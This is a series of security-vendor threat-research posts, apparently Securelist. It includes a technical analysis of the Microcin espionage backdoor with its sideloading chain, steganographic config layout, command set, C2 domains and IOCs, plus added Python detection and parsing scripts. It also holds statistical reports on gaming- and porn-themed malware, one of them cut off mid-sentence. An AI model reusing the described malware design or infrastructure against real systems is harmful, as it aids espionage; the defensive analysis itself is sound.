  • Install security software. Kaspersky solutions detect malicious scripts used in such attacks as HEUR:Trojan-PSW.Script.Generic.

Webmasters:

  • Do not install web applications and CMS components from untrusted sources. Keep all software up to date. Follow news about vulnerabilities and take recommended actions to patch them.
  • Create strong passwords for all administration accounts.
  • Limit user rights to the minimum necessary. Keep track of the number of users who have access to service interfaces.
  • Filter user-entered data and query parameters to prevent third-party code injection.
  • For e-commerce sites, it is recommended to use PCI DSS-compliant payment gateways.
IOCs

firebasestorage.googleapis[.]com/v0/b/bragvintage-f929b.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/canature-5fab3.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/ericeirasurfskate-559bf.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/gluten-8e34e.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/laser-43e6f.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/movile-720cd.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/plumb-99e97.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/redfox-64c35.appspot.com/o/*
firebasestorage.googleapis[.]com/v0/b/tictoc-9677e.appspot.com/o/*


June 19, 2020

Microcin is here

In February 2020, we observed a Trojan injected into the system process memory on a particular host. The target turned out to be a diplomatic entity. What initially attracted our attention was the enterprise-grade API-like (application programming interface) programming style. Such an approach is not that common in the malware world and is mostly used by top-notch actors.

Due to control server reuse (Choopa VPS service), target profiling techniques and code similarities, we attribute this campaign with high confidence to the SixLittleMonkeys (aka Microcin) threat actor. Having said that, we should note that they haven’t previously applied the aforementioned coding style and software architecture. During our analysis we didn’t observe any similar open source tools, and we consider this to be the actor’s own custom code.

To deliver a new network module with a coding style that we consider enterprise-grade, Microcin used steganography inside photos, including this one of a sock (payload removed here)

SixLittleMonkeys’ sphere of interest remains the same – espionage against diplomatic entities. The actor is still also using steganography to deliver configuration data and additional modules, this time from the legitimate public image hosting service cloudinary.com. The images include one related to the notorious GitLab hiring ban on Russian and Chinese citizens. In programming terms, the API-like architecture and asynchronous work with sockets is a step forward for the actor.

Why we consider the current software architecture interesting

By “enterprise-grade API-like programming style” we mean, firstly, asynchronous work with sockets. In terms of Windows user-space entities, it was I/O completion ports. In the OS kernel space, this mechanism is actually a queue for asynchronous procedure calls (APC). We believe there’s a reason for using it in backend applications on the high-loaded server-side. Obviously, however, neither client-side software nor Trojans of this kind need this server-side programming approach. So, it looks to us like the developers have applied some habits from server-side programming.

Secondly, the exported function parameters in the injected library look more like an API: the arguments are two callback functions – encryptor/decryptor and logger. So, if the authors decide to change encryption or logging algorithms, they could do so easily without even touching the network module. Once again, even targeted malicious samples rarely take such architectural issues into consideration.

Another parameter of the injected library’s exported function is the host name. If the caller does not pass the infected host name in this parameter, none of the following commands will be executed; this filters out all messages addressed to other hosts.

Initial infection

Module features | File name | Detection time
--- | --- | ---
Backdoor sideloaded by legit GoogleCrashHandler | version.dll | 2019.12.31
Downloader/decryptor inside spoolsv.exe address space | spoolsv.dll | 2020.01.16
Bitmap picture with steganography inside | Random .bmp name | 2020.01.16
Network module in the same spoolsv.exe address space | Module.dll | 2020.01.16

Infection timeline

The backdoor is started by GoogleCrashHandler.exe through .dll search order hijacking (version.dll). The downloader/decryptor (spoolsv.dll), which fetches the bitmap files carrying the steganography payload, is injected into spoolsv.exe; the API-like network module is then injected into the same system process.

Let’s cover the modules one at a time. Our telemetry shows that another Microcin backdoor was already on the host before this new network module. It’s most probably a reinfection with newer malware.

Backdoor

MD5 | File name | Compilation timestamp | Size
--- | --- | --- | ---
c9b7acb2f7caf88d14c9a670ebb18c62 | version.dll | 2020.05.20 02:37:58 | 407552

This UPX-packed .dll was executed by the legitimate GoogleCrashHandler.exe (a very common library search order hijacking) just before the New Year. The compilation timestamp is obviously spoofed. In this case we don’t know how the backdoor, along with the legitimate application, was delivered.

We won’t concentrate on this backdoor in this report, because it’s fairly typical for Microcin. We just want to emphasize that the timeline above shows it existed on the host before the analyzed module.
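As an added defender-side check (not code from the report or from the actor), the following Python script looks for the sideloading layout described above: version.dll sitting next to an executable outside the Windows system directories. The directory tree it scans is constructed for the demonstration; the DLL name comes from the report, while the list of system directories to skip is an assumption.

```python
import os
import tempfile
from pathlib import Path

# DLL name observed in this campaign: version.dll placed beside the
# legitimate GoogleCrashHandler.exe so the loader picks it up first.
SIDELOAD_DLLS = frozenset({"version.dll"})

# Directories where version.dll legitimately lives (assumption: the usual
# Windows system directories). Paths are compared case-insensitively with
# forward slashes so the check also runs on a Linux analysis box.
SYSTEM_DIR_MARKERS = ("/windows/system32", "/windows/syswow64")


def _in_system_dir(path: Path) -> bool:
    norm = str(path).replace("\\", "/").lower()
    return any(marker in norm for marker in SYSTEM_DIR_MARKERS)


def find_sideload_candidates(root, dll_names=SIDELOAD_DLLS):
    """Return (dll_path, [exe names]) for every directory outside the system
    directories where a sideload-prone DLL sits beside an executable."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        dir_path = Path(dirpath)
        if _in_system_dir(dir_path):
            continue
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        if not exes:
            continue  # a lone DLL cannot be sideloaded from here
        for name in files:
            if name.lower() in dll_names:
                hits.append((dir_path / name, exes))
    return hits


def build_sample_tree(base: Path) -> Path:
    """Create a constructed layout mirroring the report: version.dll next to
    GoogleCrashHandler.exe in a user directory, plus the legitimate copy in
    System32 that must not be reported."""
    app = base / "Users" / "victim" / "AppData" / "GoogleCrash"
    app.mkdir(parents=True)
    (app / "GoogleCrashHandler.exe").write_bytes(b"MZ stub (constructed)")
    (app / "version.dll").write_bytes(b"MZ stub (constructed)")
    sys32 = base / "Windows" / "System32"
    sys32.mkdir(parents=True)
    (sys32 / "version.dll").write_bytes(b"MZ stub (constructed)")
    (sys32 / "notepad.exe").write_bytes(b"MZ stub (constructed)")
    return base


def demo():
    """Scan the constructed tree and return hits as root-relative paths."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(Path(tmp))
        hits = find_sideload_candidates(root)
        return [(str(p.relative_to(root)).replace(os.sep, "/"), exes)
                for p, exes in hits]


if __name__ == "__main__":
    for dll_path, exes in demo():
        print(f"candidate: {dll_path} beside {', '.join(exes)}")
```

A hit is a candidate, not a verdict: confirm by checking the DLL's signature and hash before acting on it.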

Downloader/decryptor

The campaign in question starts with the 64-bit spoolsv.dll downloader/decryptor module that has to be loaded by spoolsv.exe into its address space.

Downloader/decryptor

MD5 | Modified time | Size | Build | Target ID
--- | --- | --- | --- | ---
c7e11bec874a088a088b677aaa1175a1 | 2020.03.04 12:20:13 | 155291 | 20200304L02f | @TNozi96
ef9c82c481203ada31867c43825baff4 | 2019.10.15 11:46:04 | 145233 | 20200120L03o | @TNozi96
1169abdf350b138f8243498db8d3451e | 2019.01.25 04:58:15 | 150195 | 20191119L | 123456

So far, we have registered three samples of this module. The file tail contains the following encrypted configuration data.

Parameter | Length (bytes) | Possible values
--- | --- | ---
.bmp URL len | 4 | 82
.bmp URL | .bmp URL len | http://res.cloudinary.com/ded1p1ozv/image/upload/v1579489581/<random_name>.bmp
Sleep time | 2 | 17211 and other non-round random numbers
Module build length | 4 | 15
Module build | Module build length | Date based on the previous table
Target ID length | 4 | 9
Target ID | Target ID length | Readable strings from the previous table
Random ASCII chars | 16 | Randomly generated on host
Hardcoded canary | 4 | 0x5D3A48B6

We have published the source code of our decryptor for Microcin’s configuration and steganography at https://github.com/dlegezo/common.

The bitmap URL serves to download the image (like the one with the sock shown above) with the next stage network module. The module build, target ID and random ASCII chars are for the next network module, which includes them in the control server communications.
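As an added example (not the published decryptor and not the actor's code), the following Python parser reads an already decrypted configuration tail using the field layout from the table above and validates the canary. The sample tail is constructed from values in the tables; little-endian integer encoding is an assumption the report does not state.

```python
import struct

# Hardcoded canary value from the configuration table.
CANARY = 0x5D3A48B6
# URL shape documented for the .bmp download.
URL_PREFIX = "http://res.cloudinary.com/ded1p1ozv/image/upload/v1579489581/"


def build_config_tail(url: bytes, sleep_time: int, build: bytes,
                      target_id: bytes, random_chars: bytes) -> bytes:
    """Assemble a plaintext tail in the documented field order.
    Constructed helper for exercising the parser; it does not reproduce the
    malware's encryption, which is not part of this example."""
    if len(random_chars) != 16:
        raise ValueError("random ASCII field is exactly 16 bytes")
    if not 0 <= sleep_time <= 0xFFFF:
        raise ValueError("sleep time is a 2-byte field")
    return (struct.pack("<I", len(url)) + url
            + struct.pack("<H", sleep_time)
            + struct.pack("<I", len(build)) + build
            + struct.pack("<I", len(target_id)) + target_id
            + random_chars
            + struct.pack("<I", CANARY))


def parse_config_tail(blob: bytes) -> dict:
    """Parse a decrypted downloader configuration tail into its fields.
    Order: .bmp URL (4-byte length + data), sleep time (2 bytes), module build
    (4-byte length + data), target ID (4-byte length + data), 16 random ASCII
    chars, 4-byte canary. Raises ValueError on any inconsistency."""
    off = 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(blob):
            raise ValueError(f"truncated or oversized field at offset {off}")
        chunk = blob[off:off + n]
        off += n
        return chunk

    def u32() -> int:
        return struct.unpack("<I", take(4))[0]

    cfg = {}
    cfg["bmp_url"] = take(u32()).decode("ascii")
    cfg["sleep_time"] = struct.unpack("<H", take(2))[0]
    cfg["module_build"] = take(u32()).decode("ascii")
    cfg["target_id"] = take(u32()).decode("ascii")
    cfg["random_chars"] = take(16).decode("ascii")
    canary = u32()
    if canary != CANARY:
        raise ValueError(f"bad canary 0x{canary:08X}: wrong key or not a config")
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} unexpected trailing bytes")
    # Soft check: does the URL match the documented cloudinary.com pattern?
    cfg["url_pattern_ok"] = (cfg["bmp_url"].startswith(URL_PREFIX)
                             and cfg["bmp_url"].endswith(".bmp"))
    return cfg


def is_valid_config(blob: bytes) -> bool:
    """True if the blob parses cleanly and the canary matches."""
    try:
        parse_config_tail(blob)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


# Constructed sample: URL with a made-up 17-char name (82 bytes in total, as
# in the table), sleep time, build and target ID taken from the tables.
SAMPLE_CONFIG = build_config_tail(
    (URL_PREFIX + "sample_stego_name.bmp").encode("ascii"),
    17211, b"20200304L02f", b"@TNozi96", b"ABCDEFGHIJKLMNOP")

if __name__ == "__main__":
    for key, value in parse_config_tail(SAMPLE_CONFIG).items():
        print(f"{key}: {value}")
```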

To get the bitmap, the downloader sends an HTTP GET request to cloudinary.com. The steganography is inside the color palette part of the .bmp file. A typical decryption algorithm includes four stages:

  1. Combine neighboring half bytes into one byte
  2. Decrypt data length with custom XOR-based algorithm
  3. Decrypt six-byte XOR key for main data
  4. Decrypt data itself using decrypted length and key

Besides the configuration data and steganography, the same algorithm is used for the C2 traffic. As we mentioned, due to the malware architecture, the latter can easily be changed. Encryption is XOR-based, but the key scheduling is quite specific and tricky. In the corresponding appendix we provide the part of the decryptor containing the algorithm.

Bitmap images and steganography

Besides the sock image, the campaign operators use more social-oriented photos (payload removed here). The background here is the GitLab hiring ban on Russian and Chinese citizens

So far, we have registered four different images. In all cases the encrypted content is a PE file with the next-stage network module, plus the C2 domain for that module. The C2 domain is the only parameter that comes from the bitmap; all the others are provided by the downloader.

Image content | C2 domain | Network module MD5
--- | --- | ---
Sock in washing machine | apps.uzdarakchi[.]com | 445b78b750279c8059b5e966b628950e
Two people in hoodies | forum.mediaok[.]info | 06fd6b47b1413e37b0c0baf55f885525
GitLab hiring ban | forum.uzdarakchi[.]com | 06fd6b47b1413e37b0c0baf55f885525
Woman with child, militaries | owa.obokay[.]com | 06fd6b47b1413e37b0c0baf55f885525

Network in-memory module

The downloader decrypts the configuration data and C2 domain from the bitmap and then everything is ready to start the last stage inside the same spoolsv.exe virtual address space. We consider the architectural approach in this module to be the most interesting part of the chain.

The network module’s entry point is the exported function SystemFunction000(), which takes multiple arguments. As a beacon, the Trojan prepares an HTTP POST request with the target’s fingerprinting data, and many of these arguments become part of the request.

Exported function argument | Parameter meaning
--- | ---
Target host name | This has to be the same as the infected machine host name. Only then will the Trojan start and receive commands. Initialized by the downloader
Target ID | We already enumerated these readable ASCII strings from the decrypted downloader’s config, e.g., @TNozi96
Build version | Inside these readable ASCII strings the dates are clearly mentioned. The C2 uses them to understand which build it’s currently working with
WORD field of fingerprint structure | Initialized with 0x4004 by the downloader. We don’t have enough data to describe this field’s meaning
C2 IP address and port number | The coordinates of the C2, initialized from the decrypted bitmap image
ASCII string in fingerprint structure | Unique random string generated by the downloader
BYTE to fingerprint structure | Initialized with 0x4004 by the downloader. We don’t have enough data to describe this field’s meaning
Half of maximum sleep time | Sleep time before the working cycle. Half because the full time is counted as <this arg> + <random>%<this arg>. It’s effectively a maximum of a maximum sleep time
Logger address | First callback function address. In this case it’s a logger function inside the downloader
Encryptor/decryptor address | Second callback function address. In this case it’s an encryptor/decryptor function inside the downloader

The last two arguments illustrate why we call the network module API-like: any encryption and logging routine could be used without even touching the module code. We consider this programming approach as scalable and useful for large systems. Let’s take a look at these two callback arguments.

Callback and its arguments | Callback features
--- | ---
Logger: takes an ASCII string as a log message | Logger function whose parameter is the message text. In this module all the messages are shortenings like “LIOO”, “RDOE”, etc.
Encryptor/decryptor: deals with the traffic between host and C2; takes the data, its length, the encryption key and a flag (0 to encrypt, 1 to decrypt) as arguments | Encryptor/decryptor function first used to encrypt the beacon with the target’s fingerprint. It then decrypts C2 command structures and encrypts replies to them

The module uses the Windows API function WSAIoctl() – something rarely seen in malware – to get the ConnectEx() address and sends a prepared request. Another Windows API function, GetQueuedCompletionStatus(), is in charge of asynchronous work with I/O. In other words, the malware uses I/O completion ports for Windows user-space entities, which is effectively an APC queue in the OS kernel.

The same data structure is used for both sides of the communication: from host to C2 and back. Let’s describe its main fields here.

Field | Features
--- | ---
Command code | One byte in the structure is the command code, which could vary from 0x00 to 0x16 (22). We describe the main network module commands in the table below
Error code | Another byte is used for the error code
Command argument | The main command field that takes all the necessary strings, etc. and also keeps fingerprinting data in the case of the beacon

So far, we have described the infection chain, module architecture, custom encryption and HTTP POST-based C2 communication protocol. Last, but not least, is the command set shown in the table below.

Command code | Command features
--- | ---
3 | Check if target’s ID meets the parameter
4 | List logical drives
5 | List files
6 | Create directory
7 | Remove directory
8 | Copy file
9 | Move file
10 | Delete file
11 | Execute PE
12 | Execute Windows shell command
14 | Terminate program
15 | File download
16 | Read from downloaded file
17 | File upload
18 | Write to file
19 | Stop
20 | Sleep

Infrastructure

Domain | IP | First seen | ASN
--- | --- | --- | ---
apps.uzdarakchi[.]com | 95.179.136[.]10 | November 11, 2019 | 20473
forum.uzdarakchi[.]com | 172.107.95[.]246 | February 7, 2020 | 40676
forum.mediaok[.]info | 23.152.0[.]225 | March 19, 2020 | 8100
owa.obokay[.]com | N/A (now parked) | |

To sum up

This time the Microcin campaign has made an interesting step forward, not in terms of a fancy initial infection vector, but as programmers. The API-like network module is much easier to support and update. This improvement is not only about anti-detection or anti-analysis; it’s about software architecture and a step towards a normal non-monolithic framework implementation.

IoC


June 17, 2020

Do cybercriminals play cyber games during quarantine?

Thanks to the coronavirus pandemic, the role of the Internet in our lives has undergone changes, including irreversible ones. Some of these changes are definitely for the better, some are not very good, but almost all of them in some way affect digital security issues.

We decided to take a closer look at the changes around us through the prism of information security, starting with the video game industry.

Key findings:

  • The daily number of blocked attempts to visit malicious gaming-related websites, or to browse to such sites from gaming-related websites (or forums), increased by 54% in April compared to January of this year. In May, we saw a downward trend in this indicator: -18% compared to April.
  • The number of blocked attempts to visit phishing sites that exploit online gaming topics has increased. In particular, the number of notifications from fake Steam gaming platform sites increased by 40% from February to April.
  • Attackers use Minecraft, Counter-Strike: Global Offensive and The Witcher 3: Wild Hunt most often.
  • The users most targeted by such attacks are from Vietnam (7.9%), Algeria (6.6%), Korea (6.2%), Hungary (6.2%) and Romania (6%).
I play until the boss sees

Figures from various sources show that the pandemic has led to a sharp increase in player activity. In March, according to gamesindustry.biz, sales of games, both computer and console, increased significantly.

Growth in game sales in the week of March 16-22. Source: gamesindustry.biz

In April, the number of downloads, as well as the number of simultaneous online players, of Steam reached record levels. The Steam user activity graph (both in-game and just installing the client) (Steam Database) shows the peak of activity on April 4. After that, activity started to reduce, but only slowly. Moreover, the activity graphs of the players are noticeably different from the usual ones – periods of inactivity are less pronounced than in ordinary pre-quarantine days, and the peaks last longer.

The number of Steam users per day. Source: steamdb.info

All these stats are totally understandable. First, people have more free time for games. Statistics collected by Nielsen Games as part of their regular survey of gamers confirm this thesis:

The increase in the amount of time spent playing video games by players in different countries. Source: Hollywood Reporter

Second, apparently not all the people who wanted to spend time playing video games had a computer at home that would let them do it. That is what the hardware statistics displayed on the Steam site suggest.

If you look closely at the graphs showing which video cards Steam users have, you can see a clear change in March 2020 in lines that were completely flat before. Until then, the proportions of Nvidia, Intel and AMD video cards had remained at the same level relative to each other. Since the beginning of quarantine, the share of Intel and AMD video cards has grown quite noticeably. This growth was within 2%, which might seem insignificant, until you remember that there are more than 20 million Steam users. That is, the additional number of devices with Intel and AMD graphics cards amounted to hundreds of thousands of computers. Given the specifics of video cards from different manufacturers, we can safely assume that these hundreds of thousands of devices are office laptops that arrived at home during quarantine and that people installed Steam while the boss wasn’t able to see it anyway.

Source: steampowered.com

This is also confirmed by the sudden change in the graphs showing the ratio of Intel and AMD processors (Intel also grew from the beginning of quarantine), and in the graph of the processors used by players by number of cores (atypical growth in this proportion was shown by 4-core and 2-core processors):

Source: steampowered.com

Let’s play with the bad guys?

The increase in the number of players and the time they spend in games, of course, did not go unnoticed by cybercriminals. Gamers have long been the target of attacks by bad guys, who are mainly interested in logins and passwords for game accounts. Now, with the connection of work computers to home networks, and, conversely, with the entry of home devices into work networks that are often poorly prepared for this, attacks on players are becoming not only a way to get to an individual user’s wallet, but also a way to access the corporate infrastructure.

In the first five months of 2020, the number of vulnerabilities discovered on Steam has already exceeded the number of vulnerabilities discovered in any of the previous years. This fact, among other things, indicates a growing interest in finding such vulnerabilities.

Source: cve.mitre.org

We shouldn’t forget also that at the end of April 2020, Valve confirmed the leak of the source code of the popular network games CS: GO and Team Fortress 2. Attackers are most probably already trying to parse their code in search of vulnerabilities that can be used for their own purposes. It is important to understand that these are not offline games, but online games that need a constant connection to game servers and frequent updates. This makes their users even more vulnerable, because their devices are obviously always online, and players are always ready to install an “update” so as not to lose the ability to play.

But even without technically complex attacks using zero-day vulnerabilities, attackers have a large field for their activities. Realizing that the gaming industry is experiencing an unexpected increase in the number of players, they have “increased power” in the field of attacks that exploit the gaming theme in one way or another.

The logical step on the part of the attackers was to increase the number of phishing attacks. This is confirmed by Kaspersky AntiPhishing and the Kaspersky Security Network (KSN). By comparison with February, the number of hits on the thousand most popular phishing sites containing the word “Steam” in the name has significantly increased. Such triggering peaked in April.

An increase in the number of hits on phishing sites with Steam-related topics relative to February 2020. Source: Kaspersky Security Network

There is a clear increase in the statistics of web antivirus detections of sites with names exploiting the game theme as a whole, for example, containing the names of popular video games and gaming platforms.

The number of web attacks using game subjects during the period from January to May 2020. Source: KSN

A wide variety of malicious programs are spread with such malicious links: from password stealing malware to ransomware and miners. As always, they fake free versions, updates or extensions for popular games, as well as cheat programs. A similar picture is observed among malicious files that use game-related names to stay unnoticed.

Local threats that use game-related themes as a cover

# | Verdict | % of all attacks
--- | --- | ---
1 | UDS:DangerousObject.Multi.Generic | 8.5%
2 | Worm.Win32.Fujack.cw | 5.4%
3 | PDM:Trojan.Win32.Generic | 3.8%
4 | HEUR:Trojan.Multi.StartPage.b | 3.5%
5 | PDM:Trojan.Win32.Bazon.a | 3.5%
6 | Trojan.WinLNK.Agent.ra | 3.4%
7 | HEUR:Trojan.Win32.Generic | 3.2%
8 | Email-Worm.Win32.Brontok.q | 3.2%
9 | HEUR:Trojan.WinLNK.Agent.gen | 2.7%
10 | Trojan.WinLNK.Agent.rx | 2.3%

The statistics do not take into account the Hacktool category of threats – tools that are usually installed by the users themselves but can be used for malicious purposes. We include remote access clients, traffic analyzers, etc. in this category. This category is of interest here because modern cheat programs often use the same techniques as malware, such as memory injection and exploiting vulnerabilities to bypass protection. If we add this kind of detection to the statistics, it will take first place with a share of 10%.

Judging by the statistics obtained from our web antivirus, attackers exploit Minecraft most of all. The Witcher 3: Wild Hunt, whose popularity has grown sharply thanks to the series based on the novels by Andrzej Sapkowski, also makes the TOP 3 of the most exploited games.

The number of attacks using the theme of an online game, January-May 2020. Source: KSN

Following the dynamics of detections on links containing the names of the games, we came to the conclusion that from April to early May the attackers conducted a campaign in which they used several games at once. In particular, Overwatch and PlayerUnknown’s Battlegrounds appeared on our radar. If you look closely at the graph, you can see many parallel peaks. Before and after the indicated period, this trend does not persist.

Web attacks using the themes of Overwatch and PUBG, January-May 2020. Source: KSN

Users in Vietnam are most susceptible to attacks using game-related topics: almost 8% of all web antivirus detections in this country occurred on sites whose names used the theme of games.

TOP 20 countries by the proportion of blocked attempts to enter malicious sites using the theme of online games, January-May 2020. Source: KSN

Country | Percentage of attacked users
--- | ---
Vietnam | 7.90%
Algeria | 6.67%
South Korea | 6.23%
Hungary | 6.20%
Romania | 5.98%
Poland | 5.96%
Egypt | 5.20%
Portugal | 4.84%
Malaysia | 4.75%
Greece | 4.56%
Philippines | 4.51%
Uzbekistan | 4.48%
Tunisia | 4.41%
Morocco | 4.06%
Iraq | 3.82%
Brazil | 3.61%
Italy | 3.59%
Indonesia | 3.54%
Myanmar | 3.52%
France | 3.52%

Following Vietnam, the TOP 5 countries for this parameter include Algeria, Korea, Hungary and Romania. In general, the TOP 20 includes many countries in North Africa, Asia and Europe, especially Southern and Eastern Europe.

Conclusion

Tens of millions of people who find themselves isolated at home (combined with plenty of free time) have given a serious boost to the gaming industry. Of course, the attackers could not help but take advantage of this situation and we have seen an impressive increase in attempts to switch to phishing sites that exploit gaming topics.

However, we should keep in mind that this was facilitated not only by the efforts of attackers, but also by the careless actions of the users themselves, who fell for fake emails apparently sent on behalf of game services, or who were looking for hacked versions of some popular games and cheat programs for others.

Unfortunately, in most cases, cybercriminals do not need technologically sophisticated schemes to carry out successful attacks. It is enough to use relevant topics, one of which in the spring of 2020 was video games.

June 15, 2020

Explicit content and cyberthreats: 2019 report

‘Stay at home’ is the new motto for 2020 and it has entailed many changes to our daily lives, most importantly, in terms of our digital content consumption. With users opting to entertain themselves online, malicious activity has grown. Over the past two years we have reviewed how adult content has been used to spread malware and abuse users’ privacy. This is a trend that’s unlikely to go away, especially under current circumstances. While many pornography platforms are enjoying an influx of new users and providing legitimate and safe services, the security risks remain, if not increase.

One of the key concerns that arises when it comes to adult content is the risk to privacy. Every passing year shows privacy is becoming an ever scarcer resource, with mobile devices becoming a popular new infection point. With data leaks happening more frequently than ever, abuse of privacy and its value has yet again become a popular topic of discussion, and a point of concern for many users who may have previously overlooked the issue altogether. The new reality shows this threat is real and quite tangible. Agreeing to a social contract that entails giving up your data in exchange for services, is now widely accepted in our society. It is, however, a completely different story if the data you had no intention of sharing ends up in the open. A situation like that can have devastating consequences and even put lives at risk. Our sexual preferences and sex life most probably top the list of things that we as a society still prefer to keep private, with 28% of users believing porn-related searches must be kept private. However, cybercriminals seem to think otherwise.

Recent news about data leaks relating to pornography confirms the trend. The OnlyFans leak of adult content created by sex workers, which is not only a source of income for them but also information that they did not choose to share publicly, is just one notable incident. This and other examples demonstrate how leaks lead to personal lives being violated, why that is harmful and why it may even be dangerous. The leak of over 1.195 million users’ personal information from a hentai pornography site is yet another example of how data not meant to be in any way exposed publicly was abused, putting numerous users at risk. Such incidents are happening more and more frequently, and the fault of the organizations that handle such data cannot be overlooked – too often user data is unsecured and unencrypted, despite being a tempting target for cybercriminals looking to make money.

But, of course, there’s more to it than that. To understand which threats await viewers of adult content we conducted the following research.

Methodology and key findings

To understand the risks that may be associated with pornographic content online, we researched several types of threats. We evaluated mobile and PC-focused malware disguised as adult content to see what kind of files users might be downloading and thus putting themselves at risk. We tested whether and to what extent violent content and adult dating apps are used by cybercriminals as a disguise for malware distribution. We examined the privacy aspect of adult content consumption and the dangers associated with privacy breaches – from malware hunting for credentials to pornographic websites, to what kind of sex-related content gets leaked onto the dark web. We also analyzed phishing and spam linked to porn and sex dating to see what kind of content users should be wary of. Using Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured the number and type of threats users have encountered in recent years.

Additionally, we dived into underground online markets and learnt what kind of sex-related personal data is for sale and what kind of scams are discussed among the cybercriminal fraternity.

As a result, we discovered the following:

  • Mobile porn-related threats are growing, while PC-focused malware and potentially unwanted applications are becoming less appealing to cybercriminals. The number of mobile users attacked more than doubled from 19,699 in 2018 to 42,973 in 2019. By contrast, there was a drop in PC-based threats from
  • Cybercriminals strive for more flexibility when it comes to choosing the kind of malware to distribute – almost two out of every five users attacked by porn-related PC threats have been hit by Trojan-Downloaders (39.6%) that enable other types of malware to be installed later.
  • The number of users attacked by malware hunting for credentials to access pornography websites has dropped, while the number of the malware attacks continues to grow, increasing by 37% from 2018 to 2019 and reaching a total of 1,169,153 in 2019. This demonstrates the persistence of botnets in attacking the same users – a radically different picture to 2018.
  • Privacy becomes an even bigger concern for users when it comes to adult content. Things like leaked personal images and stolen premium subscriptions for pornography sites remain in high demand, with the theme of sex continuing to be used by cybercriminals as an easy way to make money.
PC threats

Malware is spread through the web – disguised as software updates or files, it is distributed across numerous websites all over the digital space. The distribution system is vital for malware. In the past, ‘black SEO’ – a technique that enabled malicious sites to appear higher up in search results – was the most prevalent, but now that search engines have taken effective steps to hinder it, cybercriminals have turned to other channels.

Malicious software is often distributed via an affiliate network of websites that share pornographic content (we looked into a similar case, though on a less carnal theme, in one of our recent reports on Shlayer Trojan). Moreover, these websites can be created by cybercriminals using template pornographic websites – such services are freely available and their main aim is to create a source of income for the owners from advertising. With control of the content on a website where sextortion malware is distributed, cybercriminals can narrow down the victims to their target audience.

Legitimate websites can also be a source of threats, often unknowingly, with malicious links placed in the comments sections or through the use of malvertising. While the most popular online porn websites are well protected and rarely become a source of malware, this is not necessarily the case for many others. All in all, this shows that downloading anything from the web always comes with risks that have to be considered by any user.

Porn tags = malware tags

Pretty much any content that is in demand can be used as bait by cybercriminals, and this is especially true when it comes to online entertainment. Our previous research has shown that the best way to deliver infected files to victims’ devices is to disguise them as something that they are actually looking for. In the case of adult content, using porn tags has proven to be a popular method. ‘Porn tag’ is a term used to categorize the pornographic video genre. Each porn website has a dedicated page with porn tags and the number of videos available with these tags, reflecting the popularity of the content.

Previously, to determine how prevalent threats disguised as pornographic content were, we analyzed the 100 most popular tags. This showed a correlation between the popularity of porn tags and infected files under the guise of adult content – most malware is distributed under the guise of just a few of the most popular tags. This means it’s not necessary to analyze all 100 tags to understand the threat landscape. This year we limited the analysis to the 10 most popular tags – these we ran against our database of threats and Kaspersky telemetry. We selected the most popular tags based on information from the top three most visited porn websites, choosing those with the most videos uploaded.

The comparison between results for 2018 and 2019 showed that the number of users attacked by this threat has decreased, from 135,780 to 106,928, as did the number of attacks – from 148,419 to 108,973. This, however, does not signal that the threat has become less significant. The results showed a wide variety of files infected both by malware and not-a-virus threats – these included RiskTools, Adware and Downloaders. In fact, in 2019, 473 families of malware and not-a-virus threats belonging to 32 varieties were spread, slightly fewer families than in 2018 (527 families in 30 varieties).


Unique files distributed, the number of users affected and the number of detections of malicious files masked as adult content for PCs in 2018 and 2019. Source: Kaspersky Security Network

Looking at the threats that attacked most users, we see a growth in the share of Trojan-Downloaders – a type of malicious software capable of downloading any other software after installation of the Trojan on a device. Two out of every five users (39%) that downloaded malware under the guise of porn-related content were attacked by this threat. Trojan-Downloaders enable attackers to adapt their strategy and target infected users with whichever malware they deem most effective and profitable.

Once launched, the Trojan-Downloader.Win32.Autoit.vzu distracts the user with the desired video while simultaneously trying to covertly download and launch another malicious file on the infected device

Other types of Trojans are also a popular choice for cybercriminals, followed by not-a-virus threats such as Downloaders and Adware. It’s important to note that Trojan-Ransom and Backdoors, relatively dangerous threats, still remain in the top 10. These threats have been decreasing for a while, but we see that they have not been rendered obsolete. In particular, ransomware that spreads via porn-related docs is more likely to be targeted activity focused on users that view illicit content and wouldn’t want anyone to find out about it.


Top 10 classes of threat that went under the guise of porn-related categories by the number of attacked users in 2018 and 2019. Source: Kaspersky Security Network

A closer look at the most popular detection names demonstrates that the difference between the most prevalent threats in 2018 and 2019 is very minor. Downloaders became even more popular due to their aforementioned flexibility, accounting for six of the top 10 detections in 2019. Adware and not-a-virus Downloaders also remained widespread.


Top 10 detection names for threats disguised as porn-related content, by the number of attacked PC users, in 2018 and 2019. Source: Kaspersky Security Network

Credential hunters

In the digital age, virtually anyone is at risk of losing personal information, particularly valuable credentials. In order to automate the gathering of this information, cybercriminals use credential hunters – a type of malware, whose purpose is to steal login information from various websites and services. We track this sort of malware using our botnet-tracking technology, which enables monitoring of active botnets, gathers intelligence and prevents emerging threats.

Once installed on a PC, this malware can monitor web pages that are opened or create fake ones prompting the user to enter their login and password credentials. This technique is most often used for stealing banking details, though porn sites have not been immune to this malicious activity either.

The dynamics of botnet activity in relation to porn content over the past three years shows a curious tendency – it drew more interest from various groups in 2018, but started declining in 2019, even though the overall number of attacks continued to grow. This is reflected both by a significant decline in the number of users affected by botnets that stole porn accounts in 2019, as well as a decrease in the variety of botnets used to hunt for credentials. For instance, in 2017 only three malware families hunted for porn-related accounts; in 2018 the number grew to five families, while in 2019 it dropped to just one named Ramnit. This further confirms that at some point in 2018 more actors engaged in stealing password credentials from porn sites, but for some reason their interest waned in 2019.


The number of attacked users and detections of attacks by botnets hunting premium porn accounts, 2017-2019. Source: Kaspersky Security Network

